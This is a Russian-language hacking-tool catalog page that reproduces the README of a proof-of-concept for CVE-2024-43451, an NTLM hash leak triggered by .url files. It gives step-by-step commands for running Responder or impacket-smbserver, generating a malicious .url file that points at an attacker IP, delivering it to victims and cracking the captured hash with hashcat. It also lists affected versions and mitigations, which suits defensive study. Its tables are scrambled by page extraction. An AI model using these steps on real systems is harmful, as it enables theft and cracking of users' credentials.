Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — Воспроизведение CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
Инструменты/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Взлом паролейИнструменты фишингаРазведкаАнализ уязвимостейЭксплуатацияСбор информацииОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

Воспроизведение CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction

Репозиторий
61 месяц назадЕщё не проверено

CVE-2024-43451 — Уязвимость спуфинга с раскрытием NTLM-хэша Windows

Обзор

CVE-2024-43451 — это уязвимость спуфинга в Windows, приводящая к раскрытию NTLMv2-хэша. Она позволяет неаутентифицированному удалённому злоумышленнику получить NTLM-хэш жертвы, убедив её взаимодействовать с вредоносным файлом ярлыка .url. Уязвимость срабатывает при минимальном взаимодействии с пользователем — достаточно просто щёлкнуть правой кнопкой мыши, удалить или переместить файл, чтобы произошла утечка хэша. Она имеет оценку CVSS 6.5 (средний уровень) и активно эксплуатировалась в реальных атаках. CISA добавила её в каталог Known Exploited Vulnerabilities (KEV).

Технические детали

Аутентификация NTLM

NTLM (NT LAN Manager) — это протокол аутентификации с вызовом-ответом (challenge-response), используемый в Windows. Когда клиент пытается получить доступ к ресурсу по SMB, клиент и сервер выполняют рукопожатие:

  1. Клиент отправляет NEGOTIATE_MESSAGE, содержащий поддерживаемые возможности.
  2. Сервер отвечает CHALLENGE_MESSAGE, содержащим 8-байтовый nonce (вызов сервера).
  3. Клиент отвечает AUTHENTICATE_MESSAGE, содержащим NTLMv2-хэш — HMAC-MD5 от вызова, объединённого с хэшем пароля пользователя, именем пользователя и доменом.

Если злоумышленник может наблюдать или инициировать попытку аутентификации NTLM на подконтрольной ему машине, перехваченное сообщение AUTHENTICATE_MESSAGE можно взломать офлайн, чтобы восстановить пароль в открытом виде.

Формат файла .url

Файл .url — это файл ярлыка, используемый Internet Explorer и Windows Explorer для хранения ссылок. Это файл в формате INI с секцией [InternetShortcut]. Критически важные для эксплуатации поля:

  • URL= — целевой URL, который откроет Windows.
  • IconFile= — необязательный UNC-путь к ресурсу значка. Когда Windows Explorer отображает файл, он автоматически пытается получить значок из удалённой общей папки, что вызывает попытку аутентификации NTLM на сервере злоумышленника.

Вектор атаки

Злоумышленник создаёт файл .url с параметром IconFile, указывающим на \\attacker-ip\share\icon.ico. Когда жертва:

  • Щёлкает правой кнопкой мыши по файлу (Windows Explorer получает значок для контекстного меню),
  • Перемещает или копирует файл (значок считывается заново), или
  • Удаляет файл (значок запрашивается для диалога корзины),

Windows Explorer пытается загрузить значок по UNC-пути, отправляя NTLMv2-хэш жертвы на SMB-слушатель злоумышленника (например, Responder).

Затронутые версии

Все поддерживаемые версии Windows до обновления Patch Tuesday за ноябрь 2024 года:

  • Windows 10 (все версии)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Более старые неподдерживаемые версии, вероятно, также уязвимы, но не получат исправлений.

Настройка эксплуатации

Требования

  • Машина злоумышленника: Linux или Windows с инструментом захвата SMB (например, Responder, smbserver из Impacket или Inveigh).
  • Машина жертвы: любая непропатченная система Windows.
  • Сетевой доступ: жертва должна иметь возможность подключиться к IP-адресу злоумышленника на порту 445 (SMB).

Инструменты

ToolDescription
ResponderLLMNR/NBT-NS/mDNS-отравитель со встроенным SMB-сервером для захвата хэшей
Impacket

Шаги воспроизведения

1. Запуск SMB-слушателя (машина злоумышленника)

С помощью Responder:

root@kitploit:~
sudo responder -I eth0 -v

Или с помощью Impacket:

root@kitploit:~
sudo impacket-smbserver share . -smb2support

2. Создание вредоносного файла .url

root@kitploit:~
python exploit.py --ip 192.168.1.100 --output malicious.url

3. Доставка файла жертве

  • Вложение электронной почты, USB-носитель, общий файловый ресурс или загрузка из интернета.

4. Действия жертвы

Любое из следующих действий вызывает утечку хэша:

  • Щелчок правой кнопкой мыши → значок запрашивается для контекстного меню → NTLM-рукопожатие отправляется злоумышленнику
  • Удаление → значок запрашивается для диалога подтверждения
  • Перемещение/копирование → значок повторно считывается по UNC-пути
  • Простой просмотр папки в режиме Details (таблица) или Icons (значки) (загрузка значков)

5. Захват хэша

SMB-слушатель злоумышленника получает NTLMv2-хэш:

root@kitploit:~
[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Взлом хэша (офлайн)

root@kitploit:~
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Доказательство концепции (PoC)

root@kitploit:~
# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

Меры по смягчению (Mitigation)

Ссылки

  • Центр реагирования на угрозы безопасности Microsoft — CVE-2024-43451
  • Каталог известных эксплуатируемых уязвимостей (KEV) CISA
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — целевые атаки на Украину
  • Анализ кампании UAC-0194 / SparkRAT
Скачать инструмент
smbserver.py можно использовать для организации простой SMB-шары
InveighИнструмент перехвата NTLM на основе PowerShell для Windows
МераОписание
Установите ноябрьское обновление 2024 г.Установите обновление безопасности Microsoft из KB5044285
Заблокируйте исходящий SMB (порт 445)Запретите NTLM-хэшам покидать периметр сети
Отключите NTLM, где возможноИспользуйте аутентификацию только через Kerberos
Включите подпись SMBПредотвращает relay-атаки, даже если хэши перехвачены
Обучение пользователейНаучите пользователей не взаимодействовать с неожиданными файлами .url
Ограничьте обработку файлов .urlИспользуйте групповые политики для блокировки выполнения файлов .url или их доставки по электронной почте